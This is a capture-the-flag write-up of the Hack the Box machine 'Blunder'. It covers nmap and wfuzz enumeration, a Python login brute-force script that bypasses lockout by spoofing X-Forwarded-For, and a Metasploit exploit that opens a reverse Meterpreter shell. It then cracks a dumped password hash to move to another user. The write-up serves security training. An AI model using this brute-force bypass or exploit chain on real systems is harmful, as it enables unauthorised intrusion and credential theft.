Hack the Box: Blunder
Persistence is very important. You should not give up unless you are forced to give up — Elon Musk
Reconnaissance:-
Information Gathering and getting to know the target systems is the first process in ethical hacking. Reconnaissance is a set of processes and techniques (Footprinting, Scanning & Enumeration) used to covertly discover and collect information about a target system.
During reconnaissance, an ethical hacker attempts to gather as much information about a target system as possible, following the seven steps listed below −
- Gather initial information
- Determine the network range
- Identify active machines
- Discover open ports and access points
- Fingerprint the operating system
- Uncover services on ports
- Map the network
Enumeration
Enumeration can be used to gain information on −
- Network shares
- SNMP data, if they are not secured properly
- IP tables
- Usernames of different systems
- Passwords policies lists
Enumerations depend on the services that the systems offer. They can be −
- DNS enumeration
- NTP enumeration
- SNMP enumeration
- Linux/Windows enumeration
- SMB enumeration
Let us now discuss some of the tools that are widely used for Enumeration.
I am using Nmap tool for Enumeration
nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.191
kali@kali:~$ nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-03 08:30 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
Failed to resolve "vuln".
Initiating Ping Scan at 08:30
Scanning 10.10.10.191 [2 ports]
Completed Ping Scan at 08:30, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:30
Completed Parallel DNS resolution of 1 host. at 08:30, 0.03s elapsed
Initiating Connect Scan at 08:30
Scanning 10.10.10.191 [1000 ports]
Discovered open port 80/tcp on 10.10.10.191
Connect Scan Timing: About 16.63% done; ETC: 08:33 (0:02:35 remaining)
Connect Scan Timing: About 31.93% done; ETC: 08:33 (0:02:10 remaining)
Connect Scan Timing: About 46.37% done; ETC: 08:34 (0:02:27 remaining)
Connect Scan Timing: About 53.13% done; ETC: 08:35 (0:02:43 remaining)
Connect Scan Timing: About 53.47% done; ETC: 08:36 (0:03:07 remaining)
Connect Scan Timing: About 53.93% done; ETC: 08:37 (0:03:29 remaining)
Connect Scan Timing: About 70.43% done; ETC: 08:36 (0:01:57 remaining)
Connect Scan Timing: About 83.30% done; ETC: 08:36 (0:01:02 remaining)
Completed Connect Scan at 08:36, 359.25s elapsed (1000 total ports)
Initiating Service scan at 08:36
Scanning 1 service on 10.10.10.191
Completed Service scan at 08:36, 8.09s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.191.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 26.30s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 5.97s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
Nmap scan report for 10.10.10.191
Host is up, received syn-ack (0.85s latency).
Scanned at 2020-06-03 08:30:09 EDT for 400s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp closed ftp conn-refused
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 401.01 secondsPort 21 and 80 are shown.
Apache2 web server is running on port 80.
After some enumeration found website is running on ****** ***. And the version is *.*.*. from this URL
http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
Just googled ****** *** *.*.*. exploitand found this appropriate link. For more details google CVE-****-*****.
Then I searched for msfconsole for anything related to ******.
I found some stuff
$msfdb run
msf5>search ******
msf5>show info exploit/linux/http/************************It requires Username and Password .
I need to find a username and password.
So First I need to find a username and then Creating Custom Wordlist
cewl -w wordlists.txt -d 10 -m 1 http://10.10.10.191/I got my wordlist ready
Now I resume my enumeration with dir search.
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100
****** **************************************************
* Wfuzz 2.4.5-The Web Fuzzer *
**************************************** ****************
Target: http://blunder.htb/FUZZ.txt
Total requests: 4652
================================================= =================
ID Response Lines Word Chars Payload
=========================== =======================================
000003513: 200 1 L 4 W 22 Ch "******"
000004119: 200 4 L 23 W 118 Ch "****"
Total time: 44.66474
Processed Requests: 4652
Filtered Requests: 4650
Requests/sec.: 104.1537Now found two files after visiting them I found the username.
-Update the CMS
-Turn off FTP-DONE
-Remove old users-DONE
-Inform f****s that the new blog needs images-PENDINGI think I found the username f****s.
Now I have to find a password to get in and use ****** exploit.
This is a simple script to Bruteforce the wordlist
#!/usr/bin/env python3
import re
import requests
host = 'http://192.168.194.146/******'
login_url = host + '/admin/login'
username = 'admin'
wordlist = []
# Generate 50 incorrect passwords
for i in range(50):
wordlist.append('Password{i}'.format(i = i))
# Add the correct password to the end of the list
wordlist.append('adminadmin')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
breakI got the password and username then need to use the exploit.
kali@kali:~$ msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v5.0.91-dev ]
+ -- --=[ 2023 exploits - 1101 auxiliary - 343 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: When in a module, use back to go back to the top level prompt
msf5 > use exploit/linux/http/******_******_******_******
msf5 exploit(linux/http/******_******_******_******) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/******_******_******_******) > set RHOST 10.10.10.191
RHOST => 10.10.10.191
msf5 exploit(linux/http/******_******_******_******) > set RPORT 80
RPORT => 80
msf5 exploit(linux/http/******_******_******_******) > set ******USER ******
******USER => ******
msf5 exploit(linux/http/******_******_******_******) > set ******PASS **************
******PASS => ************
msf5 exploit(linux/http/******_******_******_******) > exploit
[*] Started reverse TCP handler on 10.10.14.134:4444
[+] Logged in as: ******
[*] Retrieving UUID...
[*] Uploading aQOeFykarH.png...
[*] Uploading .htaccess...
[*] Executing aQOeFykarH.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.134:4444 -> 10.10.10.191:50214) at 2020-06-09 09:33:46 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 3274 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/var/www/******-3.10.0a/bl-content/databases$That was really quick. We are in the Blunder HTB machine. Let us grab User flag.
But www-data don’t have permission to read it. only Hugo has permission to read it.
A little bit of dir traversal helps a lot
www-data@blunder:/var/www/******-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('******') or die('****** CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca******************823c695******eb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}hashid faca******************823c695******eb98d
faca******************823c695******eb98d sha1 ***********
Online encryption tool: https://md5decrypt.net/en/Sha1
Got the Password for the user named hugo.
www-data@blunder:/var/www/******-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: ***********
hugo@blunder:/var/www/******-3.9.2/bl-content/tmp$ ls
ls
fuhvuzqd.jpg thumbnails ybzqxfmw.jpg
hugo@blunder:/var/www/******-3.9.2/bl-content/tmp$ cd ~
cd ~
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
69************67d***13***73d***bGrab the user flag and submitted. Hurray, I got the user next I need to own the root flag too.
There is a lot way from here to be sure to follow.
Remaining stuff
- Privilege Escalation
- Getting Root Shell
- Grab Root Flag
Hmm, As blunder is an active machine I can't reveal all hidden stuff and the leftover stuff. I will edit this again as soon as the blunder box is retired. But this is a basic way to follow.
Thanks to egotisticalSW
Hope you guys have got something to learn from my approach. Have any issue and question please let me know in the comment section. Thanks for reading this walkthrough.
